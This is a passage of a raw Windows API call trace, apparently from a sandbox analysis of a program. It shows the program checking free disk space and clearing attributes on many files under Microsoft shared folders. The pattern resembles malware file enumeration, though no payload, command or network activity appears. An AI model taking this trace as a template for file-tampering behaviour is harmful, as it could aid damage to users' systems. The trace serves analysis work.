lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.065] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm", dwFileAttributes=0x80) returned 0 [0114.066] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.070] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg", dwFileAttributes=0x80) returned 0 [0114.071] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.074] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm", dwFileAttributes=0x80) returned 0 [0114.076] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.079] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg", dwFileAttributes=0x80) returned 0 [0114.082] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.085] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.htm", dwFileAttributes=0x80) returned 0 [0114.086] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.090] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg", dwFileAttributes=0x80) returned 0 [0114.091] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.094] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.htm", dwFileAttributes=0x80) returned 0 [0114.095] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.101] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.jpg", dwFileAttributes=0x80) returned 0 [0114.102] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.105] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm", dwFileAttributes=0x80) returned 0 [0114.106] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.110] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg", dwFileAttributes=0x80) returned 0 [0114.111] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.114] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm", dwFileAttributes=0x80) returned 0 [0114.115] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.119] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg", dwFileAttributes=0x80) returned 0 [0114.121] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.125] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.htm", dwFileAttributes=0x80) returned 0 [0114.126] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.130] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.jpg", dwFileAttributes=0x80) returned 0 [0114.131] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.131] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.131] CoTaskMemFree (pv=0x508980) [0114.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.135] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.135] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.135] CoTaskMemFree (pv=0x508980) [0114.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.136] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.136] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.137] CoTaskMemFree (pv=0x508980) [0114.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.138] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.138] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.138] CoTaskMemFree (pv=0x508980) [0114.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.138] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.138] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.138] CoTaskMemFree (pv=0x508980) [0114.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.139] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.139] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.139] CoTaskMemFree (pv=0x508980) [0114.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.140] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.140] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.140] CoTaskMemFree (pv=0x508980) [0114.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.141] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.141] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.141] CoTaskMemFree (pv=0x508980) [0114.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.142] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.142] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.142] CoTaskMemFree (pv=0x508980) [0114.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.143] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.143] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.143] CoTaskMemFree (pv=0x508980) [0114.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.144] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.144] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.144] CoTaskMemFree (pv=0x508980) [0114.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.144] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.145] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.145] CoTaskMemFree (pv=0x508980) [0114.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.149] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.149] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.149] CoTaskMemFree (pv=0x508980) [0114.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.153] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0114.156] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config", dwFileAttributes=0x80) returned 1 [0114.158] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.158] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.158] CoTaskMemFree (pv=0x508980) [0114.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.159] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.159] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.159] CoTaskMemFree (pv=0x508980) [0114.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.160] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.160] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.160] CoTaskMemFree (pv=0x508980) [0114.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.160] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.160] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.161] CoTaskMemFree (pv=0x508980) [0114.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.164] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.164] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.164] CoTaskMemFree (pv=0x508980) [0114.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.167] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.167] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.167] CoTaskMemFree (pv=0x508980) [0114.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.170] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.171] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.171] CoTaskMemFree (pv=0x508980) [0114.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.174] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.174] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.174] CoTaskMemFree (pv=0x508980) [0114.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.178] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.178] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.178] CoTaskMemFree (pv=0x508980) [0114.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.182] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0114.185] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config", dwFileAttributes=0x80) returned 1 [0114.188] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.188] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.188] CoTaskMemFree (pv=0x508980) [0114.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.189] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.189] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.189] CoTaskMemFree (pv=0x508980) [0114.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.190] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.190] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.190] CoTaskMemFree (pv=0x508980) [0114.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.190] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.190] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.190] CoTaskMemFree (pv=0x508980) [0114.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.191] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.191] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.191] CoTaskMemFree (pv=0x508980) [0114.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.192] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.193] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.193] CoTaskMemFree (pv=0x508980) [0114.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.193] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.193] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.193] CoTaskMemFree (pv=0x508980) [0114.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.194] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.194] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.194] CoTaskMemFree (pv=0x508980) [0114.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.194] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.195] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.195] CoTaskMemFree (pv=0x508980) [0114.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.196] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.196] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.196] CoTaskMemFree (pv=0x508980) [0114.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.203] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0114.204] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0114.205] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.205] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.205] CoTaskMemFree (pv=0x508980) [0114.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.209] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.209] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.209] CoTaskMemFree (pv=0x508980) [0114.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.214] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.214] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.214] CoTaskMemFree (pv=0x508980) [0114.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.215] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.215] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.216] CoTaskMemFree (pv=0x508980) [0114.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.216] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.216] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.216] CoTaskMemFree (pv=0x508980) [0114.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.223] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.223] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.224] CoTaskMemFree (pv=0x508980) [0114.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.229] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.229] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.230] CoTaskMemFree (pv=0x508980) [0114.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.234] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.234] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.234] CoTaskMemFree (pv=0x508980) [0114.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.235] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.235] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.235] CoTaskMemFree (pv=0x508980) [0114.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.236] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.236] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.236] CoTaskMemFree (pv=0x508980) [0114.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.236] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.236] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.236] CoTaskMemFree (pv=0x508980) [0114.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.237] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 